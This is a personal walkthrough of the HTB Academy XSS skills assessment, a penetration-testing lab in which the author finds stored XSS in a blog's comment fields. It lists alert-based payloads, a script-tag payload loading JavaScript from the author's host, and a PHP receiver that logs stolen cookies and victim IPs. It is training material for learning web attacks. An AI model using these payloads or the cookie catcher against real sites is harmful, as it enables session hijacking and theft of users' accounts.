HTB Academy, Penetration Testing, XSS, Cross Site Scripting, Session Hijacking, XSS Strike, FFUF, Recursive Fuzzing, Hidden Vhost, Burp Suite, Cookie Theft

HTB Academy XSS Skills Assessment

Walkthrough of the HTB Academy XSS Skills Assessment

Skills Assessment

Scenario

We are performing a Web Application Penetration Testing task for a company that hired you, which just released their new Security Blog. In our Web Application Penetration Testing plan, we reached the part where you must test the web application against Cross-Site Scripting vulnerabilities (XSS).

Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser:

Apply the skills you learned in this module to achieve the following:

  1. Identify a user-input field that is vulnerable to an XSS vulnerability
  2. Find a working XSS payload that executes JavaScript code on the target's browser
  3. Using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

Opening the page in my browser, at a glance there are several input fields to test.

image.png

I tried the basic XSS payload using script tags and window origin inside of all the comment fields.

<script>alert(window.origin)</script>

image.png

Given the behavior of the website with that popping up after, and the fact that this is a forum it seems safe to assume that I will be looking for some kind of stored XSS to take advantage of.

I waited for a bit to see if when I reloaded the page my payload would execute, but I don’t know how long their moderation process should take so in the meantime I tried the payload in the search bar as well

image.png

Trying out another payload, but checking the developer tools network tab to look at the type of request being sent, and also identifying the parameter name as “s”. This can also just be seen in the URL bar.

image.png

There was no change to the previous comment I submitted, but looking at the output of the comment, it seems like there is input sanitization going on via removing script tags. Because of this, I thought trying an img tag instead may be a good option

<img src=x onerror=alert('XSS');>

I open up burp and capture sending some junk data to the input fields so I can manipulate the request in the repeater and get an easy view of parameter names.

image.png

From that (and also from just looking at the value being sent in my url bar of my browser I can tell that the parameter name being sent into the search bar is just called “s”. With that parameter identified I set up XSS strike to automate testing that parameter for XSS vulnerabilities.

python3 xsstrike.py -u "http://10.129.201.52/assessment/?s=test"

this ended up being a bit of a rabbit hole that did not come to fruition because the website hung when I ran the tool

This is the 2nd payload type I tried manually inserting.

<img src=x onerror=alert('XSS');>

I thought that maybe it was stored, but being executed elsewhere. That in addition to the questions asking me to perform session hijacking later led me to go back through my session hijacking module notes.

In that module they showed me how to execute remote JS scripts so that I can identify which input field is the vulnerable one.

In doing so the third payload I manually injected to test for XSS was this one:

"'><script src=http://10.10.14.3:8000/test.js></script>

Setting up a python web server hosting a file with that name, I received a call back which let me know this work. But I bet i could have also manually injected jut a standard alert using the bypass at the start of that payload for something more immediately telling me it worked.

Anyways, go following my notes from the session hijacking module below:

I created 2 javascript files named after the input fields I would attempt to remotely call them from using XSS

image.png

I utilized the php code from that earlier module to setup a web server to catch and decode the cookie value that code should fetch when executed.

image.png

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Then I host the js files using a python web server, and use the php development server to host the php code above (you can see the commands entered for this below the next screenshot).

After that I inject the following XSS payloads into the suspected vulnerable input fields with their respectively named js files and I get a call back to my php web server which gives me the cookie value I’m looking for.

image.png

Screenshot of the web server calls. Python is hosting the remote JS files that are fetching the cookie. PHP is URL decoding and storing those values neatly for me!

image.png